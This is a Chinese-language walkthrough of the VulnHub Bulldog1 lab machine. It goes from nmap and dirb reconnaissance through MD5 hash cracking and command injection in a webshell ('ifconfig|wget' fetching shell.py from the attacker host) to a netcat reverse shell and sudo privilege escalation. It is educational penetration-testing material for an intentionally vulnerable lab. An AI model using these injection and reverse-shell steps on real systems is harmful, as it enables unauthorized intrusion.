vulnhub——Bulldog1
攻击机:kali linux
目标靶机:Bulldog1(可在vulnhub中搜索下载)
目录
壹 信息收集
one 查看kali的IP地址
two 主机发现
three 端口扫描
贰 渗透测试
one 指纹识别
two 目录扫描
three 查阅前端代码
four webshell命令注入
five wget尝试
six 上传shell.py脚本
seven 用python脚本getshell
叁 权限提升
壹 信息收集
one 查看kali的IP地址
ip addr/ifconfig
kali的IP地址为192.168.233.128
two 主机发现
用nmap获取目标主机IP地址
nmap -sn 192.168.233.0/24
目标主机IP地址为192.168.233.130
- 192.168.233.1 是物理机的虚拟网卡地址
- 192.168.233.2 是网关地址
- 192.168.233.128 是kali的IP地址
- 所以处于同网段下的主机的IP是192.168.233.130
three 端口扫描
使用Nmap扫描目标主机端口
nmap -sV -P 1-65535 192.168.233.130
发现目标主机开放端口信息如下:
23,ssh,可尝试爆破登录
80/8080,http,两个端口打开的页面相同,如图
该网站页面只是说了一些没用的话,没什么好关注的
贰 渗透测试
one 指纹识别
使用whatweb进行网站指纹识别
whatweb http://192.168.233.130
发现该网站使用了python,但目前不知道有什么利用价值
two 目录扫描
使用dirsearch或dirb扫描网站目录
dirb http://192.168.233.130
/robots.txt,爬虫文件,但这里有一句没用的话
/dev
有一个webshell,但是需要系统认证才能使用
还有一堆邮箱,疑似登录邮箱
/admin
有一个登录框,可以尝试弱口令,暴力破解,sql注入等
three 查阅前端代码
路走到头了,查看前端JS代码是否有敏感信息泄露
貌似其后有md5加密口令,尝试解密
nick@bulldogindustries.com/bulldog
sarah@bulldogindustries.com/bulldoglover
解密成功,尝试使用邮箱密码登录,但登陆失败
但是使用邮箱前缀名和密码可成功登录
登陆后查看个人网站,未获得有效信息
four webshell命令注入
网站给出的指令为白名单,仅能使用给出的指令
但是可以拼接指令,利用命令注入漏洞
five wget尝试
尝试搭建web服务,能否使用wget命令
在kali中,使用python搭建简易http服务
python3 -m http.server 80
回到网站webshell中,输入并执行
ifconfig|wget 192.168.233.128
回到kali,发现监听到目标地址,wget可以使用
six 上传shell.py脚本
编写shell.py脚本,存放至kali的web根目录下
在kali中用python开启http服务(在网站根目录下开启http服务)
在网站webshell中输入并执行指令来下载shell.py
ifconfig|wget http://192.168.233.128/shell.py
在webshell中执行ls查看是否下载成功
seven 用python脚本getshell
在kali中用nc监听,在网站webshell中执行刚上传的shell.py
nc -nvlp 2345
在webshell中输入并执行指令
ifconfig|python shell.py
执行python脚本后,回到kali中查看,发现成功getshell
叁 权限提升
查看用户
cat /etc/passwd
重点关注一下bulldogadmin
使用 ls-al 查看隐藏目录,关注这个“隐藏的管理目录”
查看目录
先打开note看看,一封邮件,一堆看不懂的话
再打开customPermssionApp看看
打开是一堆乱码,使用strings指令查看其中文本内容
红框圈出部分去掉H,为SUPERultimatePASSWORDyouCANTget,很有可能是密码!!!
使用python指令获取交互式shell,但是提示必须使用sudo命令
在刚才的指令前加上sudo ,之后输入刚才的疑似密码,即可成功提权
然后,去寻找海贼王留给我们的财富吧,over!
vulnhub——Bulldog1相关推荐
- vulnhub靶场,bulldog1
vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...
- (Vulnhub练习)--Bulldog1渗透实战
(Vulnhub练习)–Bulldog1渗透实战 下载地址 http://www.vulnhub.com/entry/bulldog-1,211/ 文章转载 靶机渗透测试实战(三)--Bulldog1 ...
- Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行绕过 反弹shell string分析文件得到密码提权
bulldog-1靶机 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web漏洞思路 ssh 利用思路 步骤一:浏览网页 爆破目录 步骤二: 破解hash 步骤三:利用 ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
最新文章
- 宏基因组序列物种分类之kraken 1/2和Bracken的使用
- 搭建git for windows服务器(100%可以成功)【转】
- 云炬Android开发笔记 3-1项目架构初始化
- Linux系统添加永久静态路由的方法
- flex中datagrid中的过滤功能
- 某大型IT公司招网络工程师认证试题精选(要求:CCNA或 HCNE以上)
- 华为隐藏功能扩大内存代码大全_发现将华为手机这3个功能打开,竟然可以将手机性能极限发挥...
- SVN服务器使用(一)
- Ubuntu部署python3.7的开发和运行环境
- mikrotikROS路由配置L2TP
- 解决visio中插入符号出现乱码
- 为了女朋友!熬夜撸了一个“合成大西瓜”!(附源码)
- 美团酒旅实时数据规则引擎应用实践
- 酒店网站建设需要多少钱
- html5核显加速,英伟达:用GTX 16系列显卡加速,视频编辑速度达核显8倍
- Odoo 16 企业版手册 - CRM (3)
- htc g1 android4.0,HTC解锁其旧款android手机HTC G1的BL
- 计算机符号标志nf,测试标志位指令
- 中国娃娃专访BIWEB开源php网站建站系统肖飞
- 如何使用支付宝沙箱测试单笔转账到支付宝账号(php版)
热门文章
- 扫地机器人水箱背景_一种扫地机器人的水箱结构的制作方法
- 102条简短深刻的回答,看完人生豁然开朗
- 教你如何用PCtoLCD2002生成字模以及软件的下载
- 安卓app对接网络验证系统一机一码源码脚本教程,一键注入网络验证工具
- Tableau雷达图制作——这可能是你能看到最详尽,最清爽,最感人的教程!
- 微信小程序功能:商品收藏-图片预览-客服-分享-加入购物车
- 用AdGuard Home搭建一个内部的DNS服务器,开启局域网内无广告和追踪的浏览体验
- 神秘鸭,让语音操作电脑不再神秘 小爱同学
- s3c2440移植Linux内核,移植Linux-3.4.2内核到S3C2440
- 一个程序员的多年珍藏--收藏